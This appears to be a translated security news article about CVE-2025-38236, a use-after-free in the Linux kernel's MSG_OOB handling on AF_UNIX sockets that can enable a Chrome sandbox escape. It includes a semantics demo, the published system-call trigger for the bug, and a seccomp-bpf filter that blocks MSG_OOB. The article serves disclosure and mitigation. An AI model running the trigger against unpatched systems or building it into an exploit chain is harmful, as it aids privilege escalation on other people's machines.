Jann Horn of Google Project Zero has identified a privilege-escalation vulnerability (CVE-2025-38236) in the Linux kernel. Among other things, it lets an attacker who already runs code inside an isolated Chrome renderer process (for example, after exploiting a separate vulnerability in Chrome) bypass the Chrome sandbox and execute code at kernel level. The bug has been present since Linux 6.9 and is fixed in the 6.1.143, 6.6.96, 6.12.36 and 6.15.5 kernel updates. A proof-of-concept exploit has been published.
The vulnerability stems from an implementation error in the handling of the MSG_OOB flag on AF_UNIX stream sockets. MSG_OOB ("out-of-band") lets the sender mark the last byte of a send() as urgent; the receiver can fetch that byte with recv(MSG_OOB) ahead of the ordinary data still queued on the socket. Support for MSG_OOB on AF_UNIX sockets was added in Linux 5.15 at the request of Oracle (it is built in when CONFIG_AF_UNIX_OOB is enabled), and last year its removal was proposed because the feature is barely used.
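To make the semantics concrete, the following program (an added example written for this article, not code from the kernel or from the researcher's proof of concept) queues ordinary data, then an urgent byte, and shows the order in which the receiver gets them; the function name and return convention are this example's own:

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Sends "abc" as ordinary data followed by one out-of-band byte 'Z' over an
 * AF_UNIX SOCK_STREAM socketpair and receives on the other end.
 *
 * On success returns 0 and writes the received bytes into `out` (at least
 * 8 bytes) in the order they came back, with '|' separating the MSG_OOB read
 * from the ordinary read.  Returns -1 if the kernel refuses MSG_OOB on
 * AF_UNIX (EOPNOTSUPP: pre-5.15 or CONFIG_AF_UNIX_OOB=n), -2 otherwise.
 */
int demo_unix_oob(char *out)
{
    int s[2];
    char buf[8];
    ssize_t n;
    int rc = -2;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, s) < 0)
        return -2;

    if (send(s[1], "abc", 3, 0) != 3)
        goto out;
    /* With MSG_OOB the last byte of the buffer becomes the urgent byte;
       here the buffer is just that one byte. */
    if (send(s[1], "Z", 1, MSG_OOB) != 1) {
        rc = (errno == EOPNOTSUPP) ? -1 : -2;
        goto out;
    }

    /* The urgent byte is readable first, ahead of the "abc" still queued. */
    if (recv(s[0], buf, sizeof buf, MSG_OOB) != 1)
        goto out;
    out[0] = buf[0];
    out[1] = '|';

    /* Ordinary data is untouched: a normal recv() returns "abc". */
    n = recv(s[0], buf, sizeof buf, 0);
    if (n != 3)
        goto out;
    memcpy(out + 2, buf, (size_t)n);
    out[2 + n] = '\0';

    /* The urgent byte has been consumed, so a second MSG_OOB read has
       nothing to return and fails with EINVAL instead of yielding a byte. */
    if (recv(s[0], buf, sizeof buf, MSG_OOB) != -1 || errno != EINVAL)
        goto out;

    rc = 0;
out:
    close(s[0]);
    close(s[1]);
    return rc;
}

int main(void)
{
    char seq[16];
    int rc = demo_unix_oob(seq);

    if (rc == 0)
        printf("received: %s\n", seq);   /* Z|abc */
    else if (rc == -1)
        puts("this kernel does not support MSG_OOB on AF_UNIX");
    else
        puts("unexpected failure");
    return rc == 0 ? 0 : 1;
}
```

The EINVAL on the second MSG_OOB read is worth noting: the trigger sequence for the vulnerability below repeatedly consumes urgent bytes, and it is exactly the kernel's bookkeeping of "which out-of-band skb is current" that goes wrong.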
Chrome's Linux sandbox (a seccomp-bpf system-call filter applied to renderer processes) permits UNIX-socket operations and the send()/recv() family of calls without inspecting their flags argument, so MSG_OOB was allowed alongside the other flags rather than being filtered out separately. A bug in the MSG_OOB implementation lets an unprivileged process provoke a use-after-free with the following sequence of system calls (the published trigger, shown here with the includes and main() needed to compile it; on an affected kernel the final recv() operates on freed memory):

    #include <sys/socket.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
        char dummy;
        int socks[2];

        socketpair(AF_UNIX, SOCK_STREAM, 0, socks);

        /* queue an out-of-band byte and consume it with recv(MSG_OOB), twice */
        send(socks[1], "A", 1, MSG_OOB);
        recv(socks[0], &dummy, 1, MSG_OOB);
        send(socks[1], "A", 1, MSG_OOB);
        recv(socks[0], &dummy, 1, MSG_OOB);

        /* a third out-of-band byte, an ordinary recv(), then one more
           recv(MSG_OOB): on an affected kernel this last call touches
           an skb that has already been freed */
        send(socks[1], "A", 1, MSG_OOB);
        recv(socks[0], &dummy, 1, 0);
        recv(socks[0], &dummy, 1, MSG_OOB);

        return 0;
    }
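The mitigation side of the story is a seccomp-bpf policy that looks at the flags argument instead of allow-listing the whole syscall. The program below is an added example, not Chrome's sandbox code (Chrome builds its policies with its own BPF DSL): it refuses sendto/recvfrom (what glibc's send()/recv() compile to) and sendmsg/recvmsg with EPERM whenever MSG_OOB is set, lets everything else through, and verifies itself in a forked child. Function names, the architecture handling and the exit-code convention are this example's own assumptions.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

#if defined(__x86_64__)
#define DEMO_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define DEMO_ARCH AUDIT_ARCH_AARCH64
#else
#error "add the AUDIT_ARCH_* value for this architecture"
#endif

#ifndef SECCOMP_RET_KILL_PROCESS
#define SECCOMP_RET_KILL_PROCESS 0x80000000U
#endif

/* Low 32 bits of syscall argument i (little-endian layout assumed). */
#define ARG_LO(i) offsetof(struct seccomp_data, args[i])

/* Allow every syscall unchanged, except that the four recv/send calls below
   fail with EPERM when MSG_OOB is in their flags argument. sendmmsg/recvmmsg
   would need the same treatment (their flags are args[3]). */
static struct sock_filter oob_filter[] = {
    /*  0 */ BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    /*  1 */ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, DEMO_ARCH, 1, 0),
    /*  2 */ BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
    /*  3 */ BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    /*  4 */ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_sendto,   3, 0), /* -> 8 */
    /*  5 */ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_recvfrom, 2, 0), /* -> 8 */
    /*  6 */ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_sendmsg,  3, 0), /* -> 10 */
    /*  7 */ BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_recvmsg,  2, 4), /* -> 10 / 12 */
    /*  8 */ BPF_STMT(BPF_LD | BPF_W | BPF_ABS, ARG_LO(3)),  /* sendto/recvfrom flags */
    /*  9 */ BPF_JUMP(BPF_JMP | BPF_JA, 1, 0, 0),           /* -> 11 */
    /* 10 */ BPF_STMT(BPF_LD | BPF_W | BPF_ABS, ARG_LO(2)),  /* sendmsg/recvmsg flags */
    /* 11 */ BPF_JUMP(BPF_JMP | BPF_JSET | BPF_K, MSG_OOB, 1, 0), /* set -> 13 */
    /* 12 */ BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    /* 13 */ BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
};

/* Installs oob_filter on the calling thread. Returns 0, or -1 on failure. */
int install_oob_filter(void)
{
    struct sock_fprog prog = {
        .len = sizeof(oob_filter) / sizeof(oob_filter[0]),
        .filter = oob_filter,
    };
    /* Mandatory for unprivileged callers of SECCOMP_MODE_FILTER. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) < 0 ? -1 : 0;
}

/* Checks the filter in a forked child so the caller stays unfiltered.
   Returns 1 if ordinary send()/recv() still work while MSG_OOB gets EPERM,
   0 if the filter installed but misbehaves, -1 if it could not be set up. */
int probe_oob_filter(void)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        int s[2];
        char c = 'A';
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, s) < 0)
            _exit(100);
        if (install_oob_filter() < 0)
            _exit(101);
        /* ordinary traffic must pass unchanged ... */
        if (send(s[1], &c, 1, 0) != 1 || recv(s[0], &c, 1, 0) != 1)
            _exit(1);
        /* ... while MSG_OOB is refused by the filter before it reaches the socket */
        if (send(s[1], &c, 1, MSG_OOB) != -1 || errno != EPERM)
            _exit(2);
        if (recv(s[0], &c, 1, MSG_OOB) != -1 || errno != EPERM)
            _exit(3);
        _exit(0);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    if (WEXITSTATUS(status) >= 100)
        return -1;
    return WEXITSTATUS(status) == 0;
}

int main(void)
{
    int r = probe_oob_filter();
    printf("MSG_OOB filter: %s\n",
           r == 1 ? "effective" : r == 0 ? "BROKEN" : "could not install seccomp");
    return r == 1 ? 0 : 1;
}
```

Two design points matter in practice: the architecture check at the top is what prevents a 32-bit compat syscall from being matched against 64-bit syscall numbers, and flags are inspected from the low 32 bits of the argument because seccomp sees raw register values, not the types in the C prototype.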
Source: opennet.ru
